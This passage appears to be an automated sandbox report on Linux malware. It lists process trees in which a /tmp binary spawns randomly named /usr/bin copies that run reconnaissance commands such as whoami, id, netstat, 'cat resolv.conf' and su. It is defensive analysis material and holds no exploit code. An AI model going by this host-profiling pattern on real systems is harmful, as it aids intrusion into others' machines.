Start date:	27/07/2022
Path:	/usr/bin/jyfcwmvcim
Arguments:	/usr/bin/jyfcwmvcim whoami 9446
File size:	625922 bytes
MD5 hash:	8afc239e681af15bdc90d121acc9ded4

Chronological Activities

Analysis Process: jyfcwmvcim PID: 11123, Parent PID: 11103

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/usr/bin/jyfcwmvcim
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	8afc239e681af15bdc90d121acc9ded4

Chronological Activities

Analysis Process: dkuidbsedp PID: 11104, Parent PID: 9446

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11105, Parent PID: 11104

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: jyfcwmvcim PID: 11105, Parent PID: 3310

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/usr/bin/jyfcwmvcim
Arguments:	/usr/bin/jyfcwmvcim "cat resolv.conf" 9446
File size:	625922 bytes
MD5 hash:	8afc239e681af15bdc90d121acc9ded4

Chronological Activities

Analysis Process: jyfcwmvcim PID: 11111, Parent PID: 11105

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/usr/bin/jyfcwmvcim
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	8afc239e681af15bdc90d121acc9ded4

Chronological Activities

Analysis Process: dkuidbsedp PID: 11106, Parent PID: 9446

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11109, Parent PID: 11106

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: jyfcwmvcim PID: 11109, Parent PID: 3310

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/usr/bin/jyfcwmvcim
Arguments:	/usr/bin/jyfcwmvcim id 9446
File size:	625922 bytes
MD5 hash:	8afc239e681af15bdc90d121acc9ded4

Chronological Activities

Analysis Process: jyfcwmvcim PID: 11115, Parent PID: 11109

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/usr/bin/jyfcwmvcim
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	8afc239e681af15bdc90d121acc9ded4

Chronological Activities

Analysis Process: dkuidbsedp PID: 11110, Parent PID: 9446

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11114, Parent PID: 11110

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: jyfcwmvcim PID: 11114, Parent PID: 3310

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/usr/bin/jyfcwmvcim
Arguments:	/usr/bin/jyfcwmvcim ifconfig 9446
File size:	625922 bytes
MD5 hash:	8afc239e681af15bdc90d121acc9ded4

Chronological Activities

Analysis Process: jyfcwmvcim PID: 11118, Parent PID: 11114

General

Start time:	09:50:50
Start date:	27/07/2022
Path:	/usr/bin/jyfcwmvcim
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	8afc239e681af15bdc90d121acc9ded4

Chronological Activities

Analysis Process: dkuidbsedp PID: 11155, Parent PID: 9446

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11156, Parent PID: 11155

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: nwaorjvecz PID: 11156, Parent PID: 3310

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/usr/bin/nwaorjvecz
Arguments:	/usr/bin/nwaorjvecz "ifconfig eth0" 9446
File size:	625922 bytes
MD5 hash:	6e2bcd4f3e4b8df9abbda28156055f4b

Chronological Activities

Analysis Process: nwaorjvecz PID: 11173, Parent PID: 11156

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/usr/bin/nwaorjvecz
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	6e2bcd4f3e4b8df9abbda28156055f4b

Chronological Activities

Analysis Process: dkuidbsedp PID: 11157, Parent PID: 9446

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11158, Parent PID: 11157

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: nwaorjvecz PID: 11158, Parent PID: 3310

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/usr/bin/nwaorjvecz
Arguments:	/usr/bin/nwaorjvecz "netstat -an" 9446
File size:	625922 bytes
MD5 hash:	6e2bcd4f3e4b8df9abbda28156055f4b

Chronological Activities

Analysis Process: nwaorjvecz PID: 11174, Parent PID: 11158

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/usr/bin/nwaorjvecz
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	6e2bcd4f3e4b8df9abbda28156055f4b

Chronological Activities

Analysis Process: dkuidbsedp PID: 11159, Parent PID: 9446

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11160, Parent PID: 11159

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: nwaorjvecz PID: 11160, Parent PID: 3310

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/usr/bin/nwaorjvecz
Arguments:	/usr/bin/nwaorjvecz "cd /etc" 9446
File size:	625922 bytes
MD5 hash:	6e2bcd4f3e4b8df9abbda28156055f4b

Chronological Activities

Analysis Process: nwaorjvecz PID: 11182, Parent PID: 11160

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/usr/bin/nwaorjvecz
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	6e2bcd4f3e4b8df9abbda28156055f4b

Chronological Activities

Analysis Process: dkuidbsedp PID: 11161, Parent PID: 9446

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11163, Parent PID: 11161

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: nwaorjvecz PID: 11163, Parent PID: 3310

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/usr/bin/nwaorjvecz
Arguments:	/usr/bin/nwaorjvecz "echo \"find\"" 9446
File size:	625922 bytes
MD5 hash:	6e2bcd4f3e4b8df9abbda28156055f4b

Chronological Activities

Analysis Process: nwaorjvecz PID: 11168, Parent PID: 11163

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/usr/bin/nwaorjvecz
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	6e2bcd4f3e4b8df9abbda28156055f4b

Chronological Activities

Analysis Process: dkuidbsedp PID: 11164, Parent PID: 9446

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11167, Parent PID: 11164

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: nwaorjvecz PID: 11167, Parent PID: 3310

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/usr/bin/nwaorjvecz
Arguments:	/usr/bin/nwaorjvecz uptime 9446
File size:	625922 bytes
MD5 hash:	6e2bcd4f3e4b8df9abbda28156055f4b

Chronological Activities

Analysis Process: nwaorjvecz PID: 11169, Parent PID: 11167

General

Start time:	09:50:55
Start date:	27/07/2022
Path:	/usr/bin/nwaorjvecz
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	6e2bcd4f3e4b8df9abbda28156055f4b

Chronological Activities

Analysis Process: dkuidbsedp PID: 11210, Parent PID: 9446

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11211, Parent PID: 11210

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: cqsoclzfrt PID: 11211, Parent PID: 3310

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/usr/bin/cqsoclzfrt
Arguments:	/usr/bin/cqsoclzfrt whoami 9446
File size:	625922 bytes
MD5 hash:	f7d314a270bd8415612f3c3e62c2e481

Chronological Activities

Analysis Process: cqsoclzfrt PID: 11217, Parent PID: 11211

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/usr/bin/cqsoclzfrt
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	f7d314a270bd8415612f3c3e62c2e481

Chronological Activities

Analysis Process: dkuidbsedp PID: 11212, Parent PID: 9446

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11213, Parent PID: 11212

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: cqsoclzfrt PID: 11213, Parent PID: 3310

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/usr/bin/cqsoclzfrt
Arguments:	/usr/bin/cqsoclzfrt "cd /etc" 9446
File size:	625922 bytes
MD5 hash:	f7d314a270bd8415612f3c3e62c2e481

Chronological Activities

Analysis Process: cqsoclzfrt PID: 11226, Parent PID: 11213

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/usr/bin/cqsoclzfrt
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	f7d314a270bd8415612f3c3e62c2e481

Chronological Activities

Analysis Process: dkuidbsedp PID: 11214, Parent PID: 9446

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11215, Parent PID: 11214

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: cqsoclzfrt PID: 11215, Parent PID: 3310

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/usr/bin/cqsoclzfrt
Arguments:	/usr/bin/cqsoclzfrt pwd 9446
File size:	625922 bytes
MD5 hash:	f7d314a270bd8415612f3c3e62c2e481

Chronological Activities

Analysis Process: cqsoclzfrt PID: 11221, Parent PID: 11215

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/usr/bin/cqsoclzfrt
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	f7d314a270bd8415612f3c3e62c2e481

Chronological Activities

Analysis Process: dkuidbsedp PID: 11216, Parent PID: 9446

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11218, Parent PID: 11216

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: cqsoclzfrt PID: 11218, Parent PID: 3310

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/usr/bin/cqsoclzfrt
Arguments:	/usr/bin/cqsoclzfrt who 9446
File size:	625922 bytes
MD5 hash:	f7d314a270bd8415612f3c3e62c2e481

Chronological Activities

Analysis Process: cqsoclzfrt PID: 11225, Parent PID: 11218

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/usr/bin/cqsoclzfrt
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	f7d314a270bd8415612f3c3e62c2e481

Chronological Activities

Analysis Process: dkuidbsedp PID: 11219, Parent PID: 9446

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11222, Parent PID: 11219

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: cqsoclzfrt PID: 11222, Parent PID: 3310

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/usr/bin/cqsoclzfrt
Arguments:	/usr/bin/cqsoclzfrt su 9446
File size:	625922 bytes
MD5 hash:	f7d314a270bd8415612f3c3e62c2e481

Chronological Activities

Analysis Process: cqsoclzfrt PID: 11233, Parent PID: 11222

General

Start time:	09:51:00
Start date:	27/07/2022
Path:	/usr/bin/cqsoclzfrt
Arguments:	n/a
File size:	625922 bytes
MD5 hash:	f7d314a270bd8415612f3c3e62c2e481

Chronological Activities

Analysis Process: dkuidbsedp PID: 11267, Parent PID: 9446

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11268, Parent PID: 11267

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: udrzmjfbgf PID: 11268, Parent PID: 3310

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/usr/bin/udrzmjfbgf
Arguments:	/usr/bin/udrzmjfbgf pwd 9446
File size:	625933 bytes
MD5 hash:	6ae6aafbe50076dc10606f80cdc189e9

Chronological Activities

Analysis Process: udrzmjfbgf PID: 11277, Parent PID: 11268

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/usr/bin/udrzmjfbgf
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	6ae6aafbe50076dc10606f80cdc189e9

Chronological Activities

Analysis Process: dkuidbsedp PID: 11269, Parent PID: 9446

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11270, Parent PID: 11269

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: udrzmjfbgf PID: 11270, Parent PID: 3310

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/usr/bin/udrzmjfbgf
Arguments:	/usr/bin/udrzmjfbgf top 9446
File size:	625933 bytes
MD5 hash:	6ae6aafbe50076dc10606f80cdc189e9

Chronological Activities

Analysis Process: udrzmjfbgf PID: 11282, Parent PID: 11270

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/usr/bin/udrzmjfbgf
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	6ae6aafbe50076dc10606f80cdc189e9

Chronological Activities

Analysis Process: dkuidbsedp PID: 11271, Parent PID: 9446

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11272, Parent PID: 11271

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: udrzmjfbgf PID: 11272, Parent PID: 3310

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/usr/bin/udrzmjfbgf
Arguments:	/usr/bin/udrzmjfbgf top 9446
File size:	625933 bytes
MD5 hash:	6ae6aafbe50076dc10606f80cdc189e9

Chronological Activities

Analysis Process: udrzmjfbgf PID: 11281, Parent PID: 11272

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/usr/bin/udrzmjfbgf
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	6ae6aafbe50076dc10606f80cdc189e9

Chronological Activities

Analysis Process: dkuidbsedp PID: 11273, Parent PID: 9446

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11274, Parent PID: 11273

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: udrzmjfbgf PID: 11274, Parent PID: 3310

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/usr/bin/udrzmjfbgf
Arguments:	/usr/bin/udrzmjfbgf su 9446
File size:	625933 bytes
MD5 hash:	6ae6aafbe50076dc10606f80cdc189e9

Chronological Activities

Analysis Process: udrzmjfbgf PID: 11286, Parent PID: 11274

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/usr/bin/udrzmjfbgf
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	6ae6aafbe50076dc10606f80cdc189e9

Chronological Activities

Analysis Process: dkuidbsedp PID: 11275, Parent PID: 9446

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11278, Parent PID: 11275

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: udrzmjfbgf PID: 11278, Parent PID: 3310

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/usr/bin/udrzmjfbgf
Arguments:	/usr/bin/udrzmjfbgf "cd /etc" 9446
File size:	625933 bytes
MD5 hash:	6ae6aafbe50076dc10606f80cdc189e9

Chronological Activities

Analysis Process: udrzmjfbgf PID: 11291, Parent PID: 11278

General

Start time:	09:51:05
Start date:	27/07/2022
Path:	/usr/bin/udrzmjfbgf
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	6ae6aafbe50076dc10606f80cdc189e9

Chronological Activities

Analysis Process: dkuidbsedp PID: 11322, Parent PID: 9446

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11323, Parent PID: 11322

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwgryggbpq PID: 11323, Parent PID: 3310

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/usr/bin/qwgryggbpq
Arguments:	/usr/bin/qwgryggbpq whoami 9446
File size:	625933 bytes
MD5 hash:	7c4643504cfef169ef231669a383f647

Chronological Activities

Analysis Process: qwgryggbpq PID: 11333, Parent PID: 11323

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/usr/bin/qwgryggbpq
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	7c4643504cfef169ef231669a383f647

Chronological Activities

Analysis Process: dkuidbsedp PID: 11324, Parent PID: 9446

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11325, Parent PID: 11324

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwgryggbpq PID: 11325, Parent PID: 3310

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/usr/bin/qwgryggbpq
Arguments:	/usr/bin/qwgryggbpq whoami 9446
File size:	625933 bytes
MD5 hash:	7c4643504cfef169ef231669a383f647

Chronological Activities

Analysis Process: qwgryggbpq PID: 11334, Parent PID: 11325

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/usr/bin/qwgryggbpq
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	7c4643504cfef169ef231669a383f647

Chronological Activities

Analysis Process: dkuidbsedp PID: 11326, Parent PID: 9446

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11327, Parent PID: 11326

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwgryggbpq PID: 11327, Parent PID: 3310

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/usr/bin/qwgryggbpq
Arguments:	/usr/bin/qwgryggbpq uptime 9446
File size:	625933 bytes
MD5 hash:	7c4643504cfef169ef231669a383f647

Chronological Activities

Analysis Process: qwgryggbpq PID: 11335, Parent PID: 11327

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/usr/bin/qwgryggbpq
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	7c4643504cfef169ef231669a383f647

Chronological Activities

Analysis Process: dkuidbsedp PID: 11328, Parent PID: 9446

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11329, Parent PID: 11328

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwgryggbpq PID: 11329, Parent PID: 3310

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/usr/bin/qwgryggbpq
Arguments:	/usr/bin/qwgryggbpq "cat resolv.conf" 9446
File size:	625933 bytes
MD5 hash:	7c4643504cfef169ef231669a383f647

Chronological Activities

Analysis Process: qwgryggbpq PID: 11332, Parent PID: 11329

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/usr/bin/qwgryggbpq
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	7c4643504cfef169ef231669a383f647

Chronological Activities

Analysis Process: dkuidbsedp PID: 11330, Parent PID: 9446

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11331, Parent PID: 11330

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qwgryggbpq PID: 11331, Parent PID: 3310

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/usr/bin/qwgryggbpq
Arguments:	/usr/bin/qwgryggbpq "ls -la" 9446
File size:	625933 bytes
MD5 hash:	7c4643504cfef169ef231669a383f647

Chronological Activities

Analysis Process: qwgryggbpq PID: 11336, Parent PID: 11331

General

Start time:	09:51:10
Start date:	27/07/2022
Path:	/usr/bin/qwgryggbpq
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	7c4643504cfef169ef231669a383f647

Chronological Activities

Analysis Process: dkuidbsedp PID: 11377, Parent PID: 9446

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11378, Parent PID: 11377

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: thqvayvyih PID: 11378, Parent PID: 3310

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/usr/bin/thqvayvyih
Arguments:	/usr/bin/thqvayvyih whoami 9446
File size:	625933 bytes
MD5 hash:	8a8795dac29dbd91def3756d2c65bc8d

Chronological Activities

Analysis Process: thqvayvyih PID: 11387, Parent PID: 11378

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/usr/bin/thqvayvyih
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	8a8795dac29dbd91def3756d2c65bc8d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11379, Parent PID: 9446

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11380, Parent PID: 11379

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: thqvayvyih PID: 11380, Parent PID: 3310

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/usr/bin/thqvayvyih
Arguments:	/usr/bin/thqvayvyih uptime 9446
File size:	625933 bytes
MD5 hash:	8a8795dac29dbd91def3756d2c65bc8d

Chronological Activities

Analysis Process: thqvayvyih PID: 11389, Parent PID: 11380

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/usr/bin/thqvayvyih
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	8a8795dac29dbd91def3756d2c65bc8d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11381, Parent PID: 9446

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11382, Parent PID: 11381

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: thqvayvyih PID: 11382, Parent PID: 3310

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/usr/bin/thqvayvyih
Arguments:	/usr/bin/thqvayvyih "netstat -antop" 9446
File size:	625933 bytes
MD5 hash:	8a8795dac29dbd91def3756d2c65bc8d

Chronological Activities

Analysis Process: thqvayvyih PID: 11392, Parent PID: 11382

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/usr/bin/thqvayvyih
Arguments:	n/a
File size:	625933 bytes
MD5 hash:	8a8795dac29dbd91def3756d2c65bc8d

Chronological Activities

Analysis Process: dkuidbsedp PID: 11383, Parent PID: 9446

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 11384, Parent PID: 11383

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: thqvayvyih PID: 11384, Parent PID: 3310

General

Start time:	09:51:15
Start date:	27/07/2022
Path:	/usr/bin/thqvayvyih
